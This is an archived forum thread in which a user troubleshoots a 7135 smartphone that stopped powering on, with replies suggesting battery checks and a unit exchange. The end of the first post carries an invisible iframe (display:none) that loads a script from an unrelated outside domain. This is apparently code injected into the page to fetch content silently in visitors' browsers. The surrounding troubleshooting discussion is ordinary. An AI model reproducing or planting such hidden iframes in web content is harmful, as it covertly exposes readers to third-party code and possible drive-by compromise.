+ Reply to Thread
Results 1 to 6 of 6

Thread: It Died--

  1. #1
    Registered User
    Join Date
    10-25-2002
    Posts
    90

    It Died--

    Now I don't know what is up--I was going to return it because I had poor reception but now it won't even turn on---I've tried hard reset--the battery is fully charged---I don't know--maybe I had a bad unit from the get go--

    ???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Mod-Blog's SmartPhone Correspondent
    Join Date
    08-18-2002
    Location
    Shelton, CT USA
    Posts
    559
    You may wish to remove the battery, leave the unit for a few hours to totally discharge, and then reinsert the battery and try to boot it. Of course, if you were already seeing problems, it is likely that you may just have a bad unit or one that was damaged in transit. Keep us updated on the service you get in the exchange!

  3. #3
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    you mean the 7135 right?

    what was the last thing you did befoe the phone acted up? do you have another battery to try out?

  4. #4
    Registered User
    Join Date
    10-25-2002
    Posts
    90

    Here's the story--

    I was sitting there watching a movie and I had my 7135 sitting on the table all by itself where it was doing its usual "searching for signal". (this is a room in my house where all other phones can get a signal but not the 7135)

    I looked back from time to time and could see the red light flashing indicating that it was searching for signal--then I looked back and saw that it wasn't flashing anymore and I thought--great it finally is picking up something---well after the movie I realized that it was off---thinking no wonder, it didn't find a signal it just shut itself off for some reason only this time it wouldn't come back on---

    Thinking it was the battery I tried to charge it but it wouldn't charge. I then took the battery out and put it in the charger by itself where it charged fine. The phone won't turn on though it just gets really hot when you put it in the charger with the battery.

    There's the scoop---

  5. #5
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    somethings wrong in kansas..

    sounds like a malfunction to me.. and i realy hope it isnt, but form what you suggested, it could be.

    so when you fully charge the battery in the cradle and put it in the phone you ge nothing? can you directly plug the charger into the phone like you could with the 6035 to see if it workd that way?


    in any event, id take it back and get a new one. you dont want this phone to have any issues so early in the game...

  6. #6
    Registered User
    Join Date
    10-25-2002
    Posts
    90

    Yeah--

    Yes, If I plug the phone in directly nothing--It just won't do anything. I don't know. Maybe this has something to do with the fact that I was having a horrible time with reception while no one else seems to.

    GetConnected.com is closed today. I guess I will try tomorrow.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts